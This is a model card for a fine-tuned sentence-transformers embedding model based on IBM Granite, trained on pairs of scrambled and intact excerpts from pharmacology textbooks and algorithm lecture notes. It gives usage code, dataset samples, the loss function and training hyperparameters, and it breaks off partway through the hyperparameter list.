Amprenavir, phenicol, indinavir, metronida- 2Except doxycycline and minocycline.
nafcillin and 4Except Alter Antimicrobi
sentences:
- Against Gram-Positive Cocci Against Gram-Negative Bacilli Aminoglycosides Aminoglycosides
Carbapenems Carbapenems Cephalosporins Chloramphenicol Chloramphenicol Quinolones
Clindamycin Rifampin Daptomycin Tetracyclines Glycopeptide antibiotics Tigecycline
Ketolides Macrolides Oxazolidinones Penicillins Quinolones Rifampin Streptogramins
Sulfonamides Tetracyclines Tigecycline Trimethoprim TABLE 51–5 Antimicrobial agents
that require dosage adjustment or are contraindicated in patients with renal or
hepatic impairment. Dosage Adjustment Needed in Renal Impairment Contraindicated
in Renal Impairment Dosage Adjustment Needed in Hepatic Impairment Acyclovir,
amantadine, aminoglycosides, aztreonam, carbapenems, cephalosporins,1 clarithromycin,
colistin, cycloserine, daptomycin, didanosine, emtricitabine, ethambutol, ethionamide,
famciclovir, fluconazole, flucytosine, foscarnet, ganciclovir, lamivudine, penicillins,3
pyrazinamide, quinolones, 4 rimantadine, stavudine, telavancin, telbivudine, telithromycin,
tenofovir, terbinafine, trimethoprim- sulfamethoxazole, valacyclovir, vancomycin,
zidovudine Cidofovir, methenamine, nalidixic acid, nitrofurantoin, sulfonamides
(long-acting), tetracyclines2 Amprenavir, atazanavir, chloram- phenicol, clindamycin,
erythromycin, fosamprenavir, indinavir, metronida- zole, rimantadine, tigecycline
1Except ceftriaxone. 2Except doxycycline and possibly minocycline. 3Except antistaphylococcal
penicillins (eg, nafcillin and dicloxacillin). 4Except moxifloxacin. Conditions
That Alter Antimicrobi
- 'of the integrity of membranes in cells and organelles. A. Nervous System The
developing central nervous system of the fetus and young child is the most sensitive
target organ for lead’s toxic effect. Epidemiologic studies suggest that blood
lead concentrations even less than 5 mcg/dL may result in subclinical deficits
in neurocog- nitive function in lead-exposed young children, with no demon- strable
threshold for a “no effect” level. The dose response between TABLE 57–1 Toxicology
of selected arsenic, lead, and mercury compounds. Form Entering Body Major Route
of Absorption Distribution Major Clinical Effects Key Aspects of Mechanism Metabolism
and Elimination Arsenic Inorganic arsenic salts Gastrointestinal, respiratory
(all mucosal surfaces) Predominantly soft tissues (highest in liver, kidney).
Avidly bound in skin, hair, nails Cardiovascular: shock, arrhythmias. CNS: encephalopathy,
peripheral neuropathy. Gastroenteritis; pan- cytopenia; cancer (many sites) Inhibits
enzymes; interferes with oxidative phosphorylation; alters cell signaling, gene
expression Methylation. Renal (major); sweat and feces (minor) Lead Inorganic
lead oxides and salts Gastrointestinal, respiratory Soft tissues; redistributed
to skeleton (> 90% of adult body burden) CNS deficits; peripheral neuropathy;
ane- mia; nephropathy; hypertension; reproductive toxicity Inhibits enzymes; interferes
with essential cations; alters membrane structure Renal (major); feces and breast
milk (minor) Organic (tetraethyl lead) Skin, gastrointesti- nal, respiratory Soft
tissues, especially liver, CNS Encephalopathy Hepatic dealkylation (fast) → trialkyme-
tabolites (slow) → dissociation to lead Urine and feces (major); sweat (minor)
Mercury Elemental mercury Respiratory tract Soft tissues, especially kidney, CNS
CNS: tremor, behavioral (erethism); gingivo'
- 708 SECTION VII Endocrine Drugs marked adverse effects because there is a recovery
period between each dose. The transition to an alternate-day schedule can be made
after the disease process is under control. It should be done gradu- ally and
with additional supportive measures between doses. When selecting a drug for use
in large doses, a medium- or intermediate-acting synthetic steroid with little
mineralocorticoid effect is advisable. If possible, it should be given as a single
morning dose. C. Special Dosage Forms Local therapy, such as topical preparations
for skin disease, oph- thalmic forms for eye disease, intra-articular injections
for joint disease, inhaled steroids for asthma, and hydrocortisone enemas for
ulcerative colitis, provides a means of delivering large amounts of steroid to
the diseased tissue with reduced systemic effects. Beclomethasone dipropionate,
and several other glucocorti- coids—primarily budesonide, flunisolide, and mometasone
furoate, administered as aerosols—have been found to be extremely useful in the
treatment of asthma (see Chapter 20 ). Beclomethasone dipropionate, triamcinolone
acetonide, budes- onide, flunisolide, and mometasone furoate are available as
nasal sprays for the topical treatment of allergic rhinitis. They are effec- tive
at doses (one or two sprays one, two, or three times daily) that in most patients
result in plasma levels that are too low to influ- ence adrenal function or have
any other systemic effects. Corticosteroids incorporated in ointments, creams,
lotions, and sprays are used extensively in dermatology. These preparations are
discussed in more detail in Chapter 61 . MINERALOCORTICOIDS (ALDOSTERONE, DEOXYCORTICOSTERONE,
FLUDROCORTISONE) The most important mineralocorticoid in humans is aldosterone.
However, small amounts of deoxycorticosterone (DOC) are also formed and released.
Although the amount is normally insignifi- cant, DOC was of some importance therapeut
- source_sentence: Antiprotozoal 923 MEFLOQUINE Mefloquine is effective therapy of
other Although toxicity is mefloquine one recommended for most regions with Chemistry
Mefloquine is 4-quinoline methanol is chemically quinine. can given because local
irritation with parenteral and hours. Mefloquine highly uted and treat- regimen.
elimination half-life about 20 allowing dosing chemoprophylaxis. With dos- drug
reached over number of interval can be shortened to 4 with daily doses 250 mg,
this is not and metabolites of in can be in the months completion therapy. Antimalarial
Action & strong P falciparum P is hepatic stages or gametocytes. The of unknown.
Sporadic mefloquine been from areas. At resistance appears to uncommon regions
Asia high rates border areas resis- tance quinine resistance to Clinical in
sentences:
- 938 SECTION VIII Chemotherapeutic Drugs Clinical Uses Albendazole is administered
on an empty stomach when used against intraluminal parasites but with a fatty
meal when used against tissue parasites. A. Ascariasis, Trichuriasis, and Hookworm
and Pinworm Infections For adults and children older than 2 years of age with
ascariasis and hookworm infections, the treatment is a single dose of 400 mg TABLE
53–1 Drugs for the treatment of helminthic infections. 1 Infecting Organism Drug
of Choice Alternative Drugs Roundworms (nematodes) Ascaris lumbricoides (roundworm)
Albendazole or pyrantel pamoate or mebendazole Ivermectin, piperazine Trichuris
trichiura (whipworm) Mebendazole or albendazole Ivermectin Necator americanus
(hookworm); Ancylostoma duodenale (hookworm) Albendazole or mebendazole or pyrantel
pamoate Strongyloides stercoralis (threadworm) Ivermectin Albendazole or thiabendazole
Enterobius vermicularis (pinworm) Mebendazole or pyrantel pamoate Albendazole
Trichinella spiralis (trichinosis) Mebendazole or albendazole; add corticosteroids
for severe infection Trichostrongylus species Pyrantel pamoate or mebendazole
Albendazole Cutaneous larva migrans (creeping eruption) Albendazole or ivermectin
Thiabendazole (topical) Visceral larva migrans Albendazole Mebendazole Angiostrongylus
cantonensis Albendazole or mebendazole Wuchereria bancrofti (filariasis); Brugia
malayi (filariasis); tropical eosinophilia; Loa loa (loiasis) Diethylcarbamazine
Ivermectin Onchocerca volvulus (onchocerciasis) Ivermectin Dracunculus medinensis
(guinea worm) Metronidazole Thiabendazole or mebendazole Capillaria philippinensis
(intestinal capillariasis) Albendazole Mebendazole Flukes (trematodes) Schistosoma
haematobium (bilharziasis)
- CHAPTER 52 Antiprotozoal Drugs 923 MEFLOQUINE Mefloquine is effective therapy
for many chloroquine-resistant strains of P falciparum and against other species.
Although toxicity is a concern, mefloquine is one of the recommended chemopro-
phylactic drugs for use in most malaria-endemic regions with chloroquine-resistant
strains. Chemistry & Pharmacokinetics Mefloquine hydrochloride is a synthetic
4-quinoline methanol that is chemically related to quinine. It can only be given
orally because severe local irritation occurs with parenteral use. It is well
absorbed, and peak plasma concentrations are reached in about 18 hours. Mefloquine
is highly protein-bound, extensively distrib- uted in tissues, and eliminated
slowly, allowing a single-dose treat- ment regimen. The terminal elimination half-life
is about 20 days, allowing weekly dosing for chemoprophylaxis. With weekly dos-
ing, steady-state drug levels are reached over a number of weeks; this interval
can be shortened to 4 days by beginning a course with three consecutive daily
doses of 250 mg, although this is not stan- dard practice. Mefloquine and acid
metabolites of the drug are slowly excreted, mainly in the feces. The drug can
be detected in the blood for months after the completion of therapy. Antimalarial
Action & Resistance Mefloquine has strong blood schizonticidal activity against
P falciparum and P vivax, but it is not active against hepatic stages or gametocytes.
The mechanism of action of mefloquine is unknown. Sporadic resistance to mefloquine
has been reported from many areas. At present, resistance appears to be uncommon
except in regions of Southeast Asia with high rates of multidrug resistance (especially
border areas of Thailand). Mefloquine resis- tance appears to be associated with
resistance to quinine and halofantrine but not with resistance to chloroquine.
Clinical Uses A. Chemoprophylaxis Mefloquine is effective in prophylaxis against
most strain
- the body to colonize various organs in the process called metastasis. Such tumor
stem cells thus can express clonogenic (colony-forming) capability, and they are
characterized by chromosome abnormalities reflecting their genetic instability,
which leads to progressive selection of subclones that can survive more readily
in the multicellular environment of the host. This genetic instability also allows
them to become resistant to chemotherapy and radiotherapy. The invasive and metastatic
processes as well as a series of metabolic abnormalities associated with the cancer
result in tumor-related symptoms and eventual death of the patient unless the
neoplasm can be eradicated with treatment. 54 CAUSES OF CANCER The incidence,
geographic distribution, and behavior of specific types of cancer are related
to multiple factors, including sex, age, race, genetic predisposition, and exposure
to environmental car- cinogens. Of these factors, environmental exposure is probably
most important. Exposure to ionizing radiation has been well documented as a significant
risk factor for a number of cancers, including acute leukemias, thyroid cancer,
breast cancer, lung cancer, soft tissue sarcoma, and basal cell and squamous cell
skin cancers. Chemical carcinogens (particularly those in tobacco smoke) as well
as azo dyes, aflatoxins, asbestos, benzene, and radon have all been well documented
as leading to a wide range of human cancers. Several viruses have been implicated
in the etiology of various human cancers. For example, hepatitis B and hepatitis
C are asso- ciated with the development of hepatocellular cancer; HIV is associated
with Hodgkin’s and non-Hodgkin’s lymphomas; human papillomavirus is associated
with cervical cancer and head and neck cancer; and Ebstein-Barr virus is associated
with nasopharyn- geal cancer. Expression of virus-induced neoplasia may also depend
on additional host and environmental factors that modu- late the transformation
process. Cellular genes are known that are homologous to the transforming genes
of the retroviruses, a family
pipeline_tag: sentence-similarity
library_name: sentence-transformers
---
# SentenceTransformer based on ibm-granite/granite-embedding-107m-multilingual
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [ibm-granite/granite-embedding-107m-multilingual](https://huggingface.co/ibm-granite/granite-embedding-107m-multilingual). It maps sentences & paragraphs to a 384-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [ibm-granite/granite-embedding-107m-multilingual](https://huggingface.co/ibm-granite/granite-embedding-107m-multilingual) <!-- at revision 5c793ec061753b0d0816865e1af7db3f675d65af -->
- **Maximum Sequence Length:** 512 tokens
- **Output Dimensionality:** 384 dimensions
- **Similarity Function:** Cosine Similarity
<!-- - **Training Dataset:** Unknown -->
<!-- - **Language:** Unknown -->
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: XLMRobertaModel
(1): Pooling({'word_embedding_dimension': 384, 'pooling_mode_cls_token': True, 'pooling_mode_mean_tokens': False, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
(2): Normalize()
)
```
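The three modules apply in sequence: the transformer produces per-token hidden states, the Pooling module keeps only the `[CLS]` token (since `pooling_mode_cls_token` is `True`), and `Normalize()` L2-normalizes the result. A minimal numpy sketch of the last two steps, using random stand-in token states rather than real model outputs:

```python
import numpy as np

rng = np.random.default_rng(0)
# Stand-in for transformer output: (batch, seq_len, hidden) token states.
token_states = rng.normal(size=(2, 16, 384))

# Pooling with pooling_mode_cls_token=True: keep the first ([CLS]) token.
pooled = token_states[:, 0, :]                     # (2, 384)

# Normalize(): L2-normalize each sentence embedding.
embeddings = pooled / np.linalg.norm(pooled, axis=1, keepdims=True)

print(embeddings.shape)                            # (2, 384)
print(np.linalg.norm(embeddings, axis=1))          # [1. 1.]
```

Because embeddings leave the model unit-length, cosine similarity between two of them reduces to a plain dot product.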
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("RikoteMaster/embedder-granite")
# Run inference
sentences = [
'Antiprotozoal 923 MEFLOQUINE Mefloquine is effective therapy of other Although toxicity is mefloquine one recommended for most regions with Chemistry Mefloquine is 4-quinoline methanol is chemically quinine. can given because local irritation with parenteral and hours. Mefloquine highly uted and treat- regimen. elimination half-life about 20 allowing dosing chemoprophylaxis. With dos- drug reached over number of interval can be shortened to 4 with daily doses 250 mg, this is not and metabolites of in can be in the months completion therapy. Antimalarial Action & strong P falciparum P is hepatic stages or gametocytes. The of unknown. Sporadic mefloquine been from areas. At resistance appears to uncommon regions Asia high rates border areas resis- tance quinine resistance to Clinical in',
'CHAPTER 52 Antiprotozoal Drugs 923 MEFLOQUINE Mefloquine is effective therapy for many chloroquine-resistant strains of P falciparum and against other species. Although toxicity is a concern, mefloquine is one of the recommended chemopro- phylactic drugs for use in most malaria-endemic regions with chloroquine-resistant strains. Chemistry & Pharmacokinetics Mefloquine hydrochloride is a synthetic 4-quinoline methanol that is chemically related to quinine. It can only be given orally because severe local irritation occurs with parenteral use. It is well absorbed, and peak plasma concentrations are reached in about 18 hours. Mefloquine is highly protein-bound, extensively distrib- uted in tissues, and eliminated slowly, allowing a single-dose treat- ment regimen. The terminal elimination half-life is about 20 days, allowing weekly dosing for chemoprophylaxis. With weekly dos- ing, steady-state drug levels are reached over a number of weeks; this interval can be shortened to 4 days by beginning a course with three consecutive daily doses of 250 mg, although this is not stan- dard practice. Mefloquine and acid metabolites of the drug are slowly excreted, mainly in the feces. The drug can be detected in the blood for months after the completion of therapy. Antimalarial Action & Resistance Mefloquine has strong blood schizonticidal activity against P falciparum and P vivax, but it is not active against hepatic stages or gametocytes. The mechanism of action of mefloquine is unknown. Sporadic resistance to mefloquine has been reported from many areas. At present, resistance appears to be uncommon except in regions of Southeast Asia with high rates of multidrug resistance (especially border areas of Thailand). Mefloquine resis- tance appears to be associated with resistance to quinine and halofantrine but not with resistance to chloroquine. Clinical Uses A. Chemoprophylaxis Mefloquine is effective in prophylaxis against most strain',
    'the body to colonize various organs in the process called metastasis. Such tumor stem cells thus can express clonogenic (colony-forming) capability, and they are characterized by chromosome abnormalities reflecting their genetic instability, which leads to progressive selection of subclones that can survive more readily in the multicellular environment of the host. This genetic instability also allows them to become resistant to chemotherapy and radiotherapy. The invasive and metastatic processes as well as a series of metabolic abnormalities associated with the cancer result in tumor-related symptoms and eventual death of the patient unless the neoplasm can be eradicated with treatment. 54 CAUSES OF CANCER The incidence, geographic distribution, and behavior of specific types of cancer are related to multiple factors, including sex, age, race, genetic predisposition, and exposure to environmental car- cinogens. Of these factors, environmental exposure is probably most important. Exposure to ionizing radiation has been well documented as a significant risk factor for a number of cancers, including acute leukemias, thyroid cancer, breast cancer, lung cancer, soft tissue sarcoma, and basal cell and squamous cell skin cancers. Chemical carcinogens (particularly those in tobacco smoke) as well as azo dyes, aflatoxins, asbestos, benzene, and radon have all been well documented as leading to a wide range of human cancers. Several viruses have been implicated in the etiology of various human cancers. For example, hepatitis B and hepatitis C are asso- ciated with the development of hepatocellular cancer; HIV is associated with Hodgkin’s and non-Hodgkin’s lymphomas; human papillomavirus is associated with cervical cancer and head and neck cancer; and Ebstein-Barr virus is associated with nasopharyn- geal cancer. Expression of virus-induced neoplasia may also depend on additional host and environmental factors that modu- late the transformation process. Cellular genes are known that are homologous to the transforming genes of the retroviruses, a family',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# (3, 384)
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# torch.Size([3, 3])
```
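For semantic search, embed a query and a document collection separately and rank documents by similarity. A small sketch of that ranking step with hand-made unit vectors standing in for `model.encode(...)` outputs (the vectors are illustrative only, chosen so the ordering is visible):

```python
import numpy as np

# Stand-ins for model.encode(query) and model.encode(docs).
query = np.array([1.0, 0.0, 0.0])
docs = np.array([
    [0.9, 0.1, 0.0],   # most similar to the query
    [0.0, 1.0, 0.0],   # orthogonal to the query
    [0.5, 0.5, 0.0],   # in between
])
docs = docs / np.linalg.norm(docs, axis=1, keepdims=True)

# On normalized vectors, cosine similarity is just a dot product.
scores = docs @ query
ranking = np.argsort(-scores)      # best match first
print(ranking)                     # [0 2 1]
```

In real use the only change is producing `query` and `docs` with `model.encode`, which already returns normalized vectors for this model.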
## Training Details
### Training Dataset
#### Unnamed Dataset
* Size: 34,441 training samples
* Columns: <code>anchor</code> and <code>positive</code>
* Approximate statistics based on the first 1000 samples:
| | anchor | positive |
|:--------|:-----------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string |
| details | <ul><li>min: 3 tokens</li><li>mean: 99.93 tokens</li><li>max: 255 tokens</li></ul> | <ul><li>min: 14 tokens</li><li>mean: 245.16 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| anchor | positive |
|:-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code>March Lecture Solving using by Svensson1 In this following: We describe Multiplicative Hedge) • We this method to solve is these lecture are on of “Lecture 11 of in 2015” written and Simon Rodriguez and on by Kaul that the lecture previous we to use the majority method order to fairly general with days N experts as For t . , gives advice: 2. advice the expert, of and the decides 4. observes suffers was majority parameterized by ε “learning rate”), now as follows: • each i weight initialized 1. are trustworthy the ning.) each t: • Predict based on w(t) After observing the vector, i expert the lecture we case = following any sequence of i of WM mistake</code> | <code>Advanced Algorithms March 22, 2022 Lecture 9: Solving LPs using Multiplicative Weights Notes by Ola Svensson1 In this lecture we do the following: • We describe the Multiplicative Weight Update (actually Hedge) method. • We then use this method to solve covering LPs. • This is a very fast and simple (i.e., very attractive) method for solving these LPs approximately. These lecture notes are partly based on an updated version of “Lecture 11 of Topics in TCS, 2015” that were written by Vincent Eggerling and Simon Rodriguez and on the lecture notes by Shiva Kaul that we used in the last lecture. 1 Recall last lecture In the previous lecture, we saw how to use the weighted majority method in order to fairly smartly follow the advice of experts. Recall that the general game-setting with T days and N experts was as follows: For t = 1, . . . , T: 1. Each expert i ∈[N] gives some advice: UP or DOWN 2. Aggregator (you) predicts, based on the advice of the expert, UP or DOWN. 3. Adversary, with k...</code> |
| <code>Last ε The same proof the For duration expert i ∈[N], of WM mistakes ε) · (# i’s mistakes) + O(log(N)/ε) 1Disclaimer: notes They not been and may typos,</code> | <code>Last lecture we analyzed the case when ε = 1/2. The same proof gives the following Theorem 1 For any sequence of outcomes, duration T, and expert i ∈[N], # of WM mistakes ≤2(1 + ε) · (# of i’s mistakes) + O(log(N)/ε) . 1Disclaimer: These notes were written as notes for the lecturer. They have not been peer-reviewed and may contain inconsistent notation, typos, and omit citations of relevant works. 1</code> |
| <code>[Sketch] The proof done by potential function: for each = 1, . , 1, Φ(t) = i We lower potential the mistakes of i. We it in of our mistakes. The weight of expert down by a −ε) i does. As weight is 1, Φ(T +1) = +1) ≥w(T +1) = (1 −ε)# of . Every the experts was (since majority weights are (1 −ε). that the factor every time Φ(T −ε/2)# mistakes = N −ε/2)# , equality used that = was initialized with a weight above bounds give us (1 mistakes ≤N · (1 of . sides, allowing for randomized strategies In the exercises, you proved that are instances for weighted This overcome this we allow random instead of always making prediction the to create A is often general is often good the of adversaries. Allowing randomized leads to following with T t . . ,</code> | <code>Proof [Sketch] The proof was done by defining a potential function: for each t = 1, . . . , T + 1, let Φ(t) = X i∈[N] w(t) i . We now lower bound the “final” potential Φ(T +1) using the number of mistakes of i. We then upper bound it in terms of our number of mistakes. Lower bound: The weight of expert i goes down by a factor (1 −ε) for each mistake i does. As the initial weight of i is 1, Φ(T +1) = X j∈[N] w(T +1) j ≥w(T +1) i = (1 −ε)# of i’s mistakes . Upper bound: Every time WM errs, at least half the weight of the experts was wrong (since weighted majority was wrong). These weights are then decreased by (1 −ε). It follows that the potential goes down by at least a factor (1 −ε/2) every time WM errs. And so Φ(T +1) ≤Φ(1) · (1 −ε/2)# of WM mistakes = N · (1 −ε/2)# of WM mistakes , where for the equality we used that Φ(1) = N since each expert was initialized with a weight of 1. The above bounds give us (1 −ε)# of i’s mistakes ≤Φ(T +1) ≤N · (1 −ε/2)# of WM mistakes . Taking logs on b...</code> |
* Loss: [<code>MultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#multiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim"
}
```
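MultipleNegativesRankingLoss treats each anchor's own positive as the target and the other positives in the batch as in-batch negatives: cosine similarities are scaled (here by 20.0) and fed to softmax cross-entropy with the diagonal as labels. A hedged numpy sketch of that computation on toy embeddings (not real model outputs):

```python
import numpy as np

def mnrl_loss(anchors, positives, scale=20.0):
    """In-batch-negatives cross-entropy over scaled cosine similarities."""
    a = anchors / np.linalg.norm(anchors, axis=1, keepdims=True)
    p = positives / np.linalg.norm(positives, axis=1, keepdims=True)
    logits = scale * (a @ p.T)                    # (batch, batch) similarities
    # Softmax cross-entropy; label for anchor i is positive i (the diagonal).
    logits -= logits.max(axis=1, keepdims=True)   # numerical stability
    log_probs = logits - np.log(np.exp(logits).sum(axis=1, keepdims=True))
    return -np.mean(np.diag(log_probs))

rng = np.random.default_rng(0)
anchors = rng.normal(size=(4, 8))
positives = anchors + 0.1 * rng.normal(size=(4, 8))   # near-duplicate pairs
print(mnrl_loss(anchors, positives))   # near zero: each diagonal dominates
```

Minimizing this loss pushes each anchor toward its own positive and away from every other positive in the batch, which is why larger batches act as harder training signal.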
### Evaluation Dataset
#### Unnamed Dataset
* Size: 3,827 evaluation samples
* Columns: <code>anchor</code> and <code>positive</code>
* Approximate statistics based on the first 1000 samples:
| | anchor | positive |
|:--------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string |
| details | <ul><li>min: 15 tokens</li><li>mean: 174.64 tokens</li><li>max: 266 tokens</li></ul> | <ul><li>min: 55 tokens</li><li>mean: 432.79 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| anchor | positive |
|:-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code>CHAPTER 39 Adrenocorticosteroids Adrenocortical Antagonists occurs. of /d of or in intermediate-, long-acting glucocorticoids greater growth-suppressing the steroid in larger than amounts, as cortisone hydrocortisone, which mineralocorticoid effects addition to glucocorticoid and fluid and loss of potassium. patients this a hypokalemic, and in blood pressure. hypoproteinemia, renal disease, liver disease, also occur. In patients with disease, small of may These by using non-salt-retaining and supplements. C. Suppression corticosteroids adrenal suppression occur. weeks the given appropriate at times dosage 24–48 hours) or stress ten-fold for or costeroid dosage be it slowly. If to reduction be slow levels. It take 2–12 to and cortisol may not to normal The suppression not treatment ACTH does time for normal function. the too receiving a certain disorder, the</code> | <code>CHAPTER 39 Adrenocorticosteroids & Adrenocortical Antagonists 707 hypertension also occurs. In dosages of 45 mg/m 2 /d or more of hydrocortisone or its equivalent, growth retardation occurs in children. Medium-, intermediate-, and long-acting glucocorticoids have greater growth-suppressing potency than the natural steroid at equivalent doses. When given in larger than physiologic amounts, steroids such as cortisone and hydrocortisone, which have mineralocorticoid effects in addition to glucocorticoid effects, cause some sodium and fluid retention and loss of potassium. In patients with normal cardiovas- cular and renal function, this leads to a hypokalemic, hypochloremic alkalosis and eventually to a rise in blood pressure. In patients with hypoproteinemia, renal disease, or liver disease, edema may also occur. In patients with heart disease, even small degrees of sodium retention may lead to heart failure. These effects can be minimized by using synthetic non-salt-retaining steroids, ...</code> |
| <code>is a treatment not reduce the return function. dosage rapidly a certain the symptoms the in patients an disorder patients Cushing’s disease) symptoms with rapid symptoms include anorexia, vomit- ing, weight loss, postural reflect true glucocorticoid deficiency, occur in the normal or even plasma levels, sug- gesting glucocorticoids must carefully the hyperglycemia, sodium with edema hypertension, hypokalemia, peptic osteopo- rosis, and and intermittent alternate-day) can on this Even patients may of stress, surgical are or or acci- occur. B. with with peptic hypertension with failure, cer- as varicella tuberculosis, psycho- ses, osteoporosis, Glucocorticoid differ respect relative anti- inflammatory and mineralocorticoid of available ( Table and these factors should be in drug to used. ACTH Adrenocortical Steroids patients normal</code> | <code>is not a pituitary problem, and treatment with ACTH does not reduce the time required for the return of normal function. If the dosage is reduced too rapidly in patients receiving gluco- corticoids for a certain disorder, the symptoms of the disorder may reappear or increase in intensity. However, patients without an underlying disorder (eg, patients cured surgically of Cushing’s disease) also develop symptoms with rapid reductions in cortico- steroid levels. These symptoms include anorexia, nausea or vomit- ing, weight loss, lethargy, headache, fever, joint or muscle pain, and postural hypotension. Although many of these symptoms may reflect true glucocorticoid deficiency, they may also occur in the presence of normal or even elevated plasma cortisol levels, sug- gesting glucocorticoid dependence. Contraindications & Cautions A. Special Precautions Patients receiving glucocorticoids must be monitored carefully for the development of hyperglycemia, glycosuria, sodium retention with ede...</code> |
| <code>( Table and these should be taken in be A. ACTH ACTH used past production to However, when is able, ACTH therapeutic agent has abandoned. which claimed be effective than were due of of were dosage Dosage the regimen physician consider the disease, amount likely to required the effect, therapy. required for the dose to obtain initial the for needed effect be until a small or symptoms is When it is continuously plasma levels to ACTH, paren- preparation oral doses frequent The situation with respect use of inflammatory allergic The same total quantity few be effective many smaller slowly absorbed autoimmune involving organs aggressively, is as treatment. complexes macrophages, of predni- divided doses dosage is serious dosage can gradually large required prolonged time, after control When used manner, large amounts</code> | <code>available ( Table 39–1 ), and these factors should be taken into account in selecting the drug to be used. A. ACTH versus Adrenocortical Steroids In patients with normal adrenals, ACTH was used in the past to induce the endogenous production of cortisol to obtain similar effects. However, except when an increase in androgens is desir- able, the use of ACTH as a therapeutic agent has been abandoned. Instances in which ACTH was claimed to be more effective than glucocorticoids were probably due to the administration of smaller amounts of corticosteroids than were produced by the dosage of ACTH. B. Dosage In determining the dosage regimen to be used, the physician must consider the seriousness of the disease, the amount of drug likely to be required to obtain the desired effect, and the duration of therapy. In some diseases, the amount required for maintenance of the desired therapeutic effect is less than the dose needed to obtain the initial effect, and the lowest possible dosage for th...</code> |
* Loss: [<code>MultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#multiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim"
}
```
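For intuition, this loss treats every other in-batch positive as a negative for a given anchor, scales cosine similarities by `scale` (here 20.0), and applies cross-entropy. A minimal pure-Python sketch — an illustration of the computation, not the sentence-transformers implementation:

```python
import math

def cos_sim(a, b):
    # Cosine similarity between two vectors.
    dot = sum(x * y for x, y in zip(a, b))
    return dot / (math.sqrt(sum(x * x for x in a)) *
                  math.sqrt(sum(x * x for x in b)))

def mnr_loss(anchors, positives, scale=20.0):
    # For anchor i, positives[i] is the target; all other positives in the
    # batch act as in-batch negatives. Scaled similarities go through
    # cross-entropy (negative log-softmax at the target index).
    total = 0.0
    for i, a in enumerate(anchors):
        scores = [scale * cos_sim(a, p) for p in positives]
        log_sum_exp = math.log(sum(math.exp(s) for s in scores))
        total += log_sum_exp - scores[i]
    return total / len(anchors)

anchors = [[1.0, 0.0], [0.0, 1.0]]
positives = [[0.9, 0.1], [0.1, 0.9]]
print(mnr_loss(anchors, positives))  # near zero: each anchor matches its own positive
```

The `scale` of 20 acts as an inverse temperature: larger values sharpen the softmax over in-batch candidates.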
### Training Hyperparameters
#### Non-Default Hyperparameters
- `eval_strategy`: steps
- `per_device_train_batch_size`: 128
- `per_device_eval_batch_size`: 128
- `learning_rate`: 2e-05
- `num_train_epochs`: 5
- `warmup_ratio`: 0.1
- `fp16`: True
- `dataloader_drop_last`: True
- `dataloader_num_workers`: 2
- `load_best_model_at_end`: True
- `push_to_hub`: True
- `hub_model_id`: RikoteMaster/embedder-granite
- `hub_strategy`: end
- `hub_private_repo`: True
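Since `warmup_steps` is 0 and `warmup_ratio` is 0.1, the linear scheduler derives its warmup length from the total optimizer-step count. A rough back-of-the-envelope; the steps-per-epoch figure is an assumption inferred from the training logs (step 50 at epoch 0.1859), not stated explicitly in this card:

```python
# Assumed, not stated in the card: inferred from the training logs,
# where step 50 corresponds to epoch 0.1859 (50 / 0.1859 ≈ 269).
steps_per_epoch = 269
num_train_epochs = 5
warmup_ratio = 0.1

total_steps = steps_per_epoch * num_train_epochs
warmup_steps = int(total_steps * warmup_ratio)
print(total_steps, warmup_steps)  # 1345 134
```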
#### All Hyperparameters
<details><summary>Click to expand</summary>
- `overwrite_output_dir`: False
- `do_predict`: False
- `eval_strategy`: steps
- `prediction_loss_only`: True
- `per_device_train_batch_size`: 128
- `per_device_eval_batch_size`: 128
- `per_gpu_train_batch_size`: None
- `per_gpu_eval_batch_size`: None
